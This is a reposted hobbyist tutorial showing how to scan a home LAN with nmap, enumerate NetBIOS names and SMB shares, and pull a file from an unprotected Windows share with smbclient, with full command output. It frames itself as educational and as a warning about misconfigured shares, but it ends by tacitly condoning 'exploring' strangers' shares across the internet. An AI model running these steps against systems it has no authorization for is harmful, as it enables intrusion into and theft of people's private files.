So you want to be a hacker...
Please note that this is not my article. I could have easily wrote the same thing but I think this is a very good intro to "hacking" windows. I've had a lot of questions about exploiting lately so here is step one. If you have trouble with this then give up now. All the tools used here are included in backtrack. Please use this info responsibly. accessing shared files that are not yours is most certainly a crime.
The first step in exploring remote shares is to find computers that are offering open shares. For this purpose I use NMAP. We'll start by scanning for computers offering an open port 139. If the port is filtered then we may have trouble, but if its open we should be good to begin exploring. Ports 137 and 139 are used by Windows for Netbios shares.
I'm going to begin by poking around my LAN (192.168.0.1-255). These are all reserved addresses in my home network so don't bother trying to use the exact IP's I use. There are three computers on the environment I'm playing in and one is deliberately set up with an insecure share. The network looks like this (although I'm sort of cheating here by already knowing what my target will look like, but this is for educational purposes :
192.169.0.1 Windows 2000 Pro - Primary Domain Ctrl.
192.168.0.2 Mandrake 8.1 Laptop (Me)
192.168.0.5 Windows ME (My Girlfriend's Computer)
Ok, so lets start by nmapping the whole shebang and looking for open port 139's.
[root@laptop /]# nmap -sS -O 192.168.0.1-6 -p 139
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port
Interesting ports on (192.168.0.1):
Port
State
Service
139/tcp
open
netbios-ssn
Remote OS guesses: Windows Me or Windows 2000 RC1 through final release, Windows Millenium Edition v4.90.3000
The 1 scanned port on laptop.madirish.net (192.168.0.2) is: closed
Interesting ports on (192.168.0.5):
Port
State
Service
139/tcp
open
netbios-ssn
Remote OS guesses: Windows Me or Windows 2000 RC1 through final release, Windows Millenium Edition v4.90.3000
Nmap run completed -- 6 IP addresses (3 hosts up) scanned in 53 seconds
Ok, so now I've got my two potential targets, 192.168.0.1 and 192.168.0.5 both have the correct port. The next stage is to find out what these machine's Netbios names are. Without this information we won't be able to request any share information from these computers (because Microsoft tries to make everything easy, even networking, and identifies computers on a network not by their IP address but by their 'name'). Ok, the syntax for requesting name information is 'nmblookup -A 111.111.111.111' with the appropriate IP address instead of the ones. The '-A' flag denotes a remote computer (a lot like the windows command 'nbtstat -A 111.111.111.111' although that identifies existing connections). Ok, so lets see what we can see, we'll start with the ME machine at 192.168.0.5:
[root@laptop /]# nmblookup -A 192.168.0.5
Looking up status of 192.168.0.5
GIRLFRIEND
<00> -
*
B
<ACTIVE>
WORKGROUP
<00> -
<GROUP>
B
<ACTIVE>
GIRLFRIEND
<03> -
*
B
<ACTIVE>
GIRLFRIEND
<20> -
*
B
<ACTIVE>
WORKGROUP
<1e> -
<GROUP>
B
<ACTIVE>
MADIRISH GIRL
<03> -
*
B
<ACTIVE>
(Note that I've replaced some information since this is online and all). Ok, so now we've got the computer name, 'GIRLFRIEND'. We're going to need this to investigate shares. To do this we'll use the diagnostic program smbclient:
[root@laptop /]# smbclient -LGIRLFRIEND -I 192.168.0.5
added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224
Password:
Sharename
Type
Comment
---------
----
-------
C
Disk
PRINTER$
Disk
HP
Printer
HP DeskJet 820Cxi
IPC$
IPC
Remote Inter Process Communication
Server
Comment
---------
-------
MADIRISH-DT
GIRLFRIEND
MADIRISH GIRL
Workgroup
Master
---------
-------
WORKGROUP
MADIRISH-DT
I entered 'none' for the password and it turned out that I could retrieve this list without a password. Use the '-N' flag on the smbclient command to suppress the password prompt. The interesting thing to note here is that there is all sorts of information about the PDC (Primary Domain Controller) MADIRISH-DT. This is the 'Browse Master' that holds all the Netbios names for the network. So the entire C drive is shared on this computer. We'll try to connect to the shared C drive (although I know its password protected). Notice my attempt will fail when I enter a bad password:
[root@laptop /]# smbclient //GIRLFRIEND/c -I 192.168.0.5
added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224
Password:
tree connect failed: ERRSRV - ERRbadpw (Bad password - name/password pair in a Tree Connect or Session Setup are invalid.)
Since I know I'm not going to get any further on this computer, I'm going to switch my probes to MADIRISH-DT at 192.168.0.1. I'm going to repeat my command set to find out all the information I need:
[root@laptop ]$ nmblookup -A 192.168.0.1
Looking up status of 192.168.0.1
MADIRISH-DT
<00> -
B <ACTIVE>
MADIRISH-DT
<20> -
B <ACTIVE>
WORKGROUP
<00> -
<GROUP>
B <ACTIVE>
WORKGROUP
<1e> -
<GROUP>
B <ACTIVE>
MADIRISH-DT
<03> -
B <ACTIVE>
MADIRISH-DT
<6a> -
B <ACTIVE>
WORKGROUP
<1d> -
B <ACTIVE>
MADIRISH-DT
<87> -
B <ACTIVE>
..__MSBROWSE__.
<01> -
<GROUP>
B <ACTIVE>
ADMINISTRATOR
<03> -
B <ACTIVE>
You'll notice that the entry labeled <03> is the user logged into the computer. I'll continue with (note the second flag is an upper case i, not a lower case L):
[root@laptop /]$ smbclient -L madirish-dt -I 192.168.0.1 -N
added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Sharename
Type
Comment
---------
----
-------
IPC$
IPC
Remote IPC
share
Disk
ADMIN$
Disk
Remote Admin
C$
Disk
Default share
Server
Comment
---------
-------
MADIRISH-DT
GIRLFRIEND
MADIRISH GIRL
Workgroup
Master
---------
-------
WORKGROUP
MADIRISH-DT
Ok, lets see if we can't connect to the 'share' disk share. We use the same 'smbclient' command to do this, but with other arguments. What we're going to do is actually request a connection to the share. If this completes successfully our prompt will instantly change to:
smb>
At that point you can type '?' to get a list of commands, but smbclient functions a lot like ftp so all those commands will be viable. Lets go ahead and see what happens when we request access to this share:
[root@laptop /]# smbclient //madirish-dt/share -I 192.168.0.1 -N
added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: > dir
.
DA
0
Sat Mar 16 10:51:45 2002
..
DA
0
Sat Mar 16 10:51:45 2002
NewDoc.txt
A
0
Sat Mar 16 10:48:32 2002
screenshot.jpg
A
145878
Sat Mar 16 10:51:48 2002
* **** 51834 blocks of size 131072. 16437 blocks available
smb: >
And you'll notice I'm in . At this point you could use 'put' or 'get' to push or pull files to and from the share. For instance, to grab NewDoc.txt (although its size is showing as '0' so I know its empty), I use:
[root@laptop /]# smbclient //madirish-dt/share -I 192.168.0.1 -N
added interface ip=192.168.0.2 bcast=192.168.0.31 nmask=255.255.255.224
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: > get NewDoc.txt
getting file NewDoc.txt of size 0 as NewDoc.txt (0.0 kb/s) (average 0.0 kb/s)
smb: > exit
[root@laptop /]# ls -l NewDoc.txt
-rw-r--r-- 1 root root 0 Mar 17 09:28 NewDoc.txt
And its just that easy, I've swiped NewDoc.txt off of the MADIRISH-DT server.
At this point you're probably wondering why I pick on Windows shares so often. The answer is that these targets abound. As high speed connections proliferate, more and more windows clients are coming on the internet. Very few people understand how to properly set up shares, and Windows doesn't really prompt users about improper configurations. Although Windows XP uses a more advanced architecture (its NT based at the core), it is even more difficult to set up a proper share on XP. Its far easier to set up a share and open it to everyone than actually customize the share with proper permissions. The fact that this article demonstrates how easy it is to intrude upon a poorly protected Windows share should serve as a warning.
Remember, I'm writing this article for educational purposes only. It is more than possible to use the information herein for legitimate purposes. Please remember, if you're going to use this information to go exploring across the internet, don't delete or destroy anything. People get concerned when they shut down their home computers and they get a 'Warning: 1 user is still connected', but when they find their tax information has been destroyed they call the cops.
________________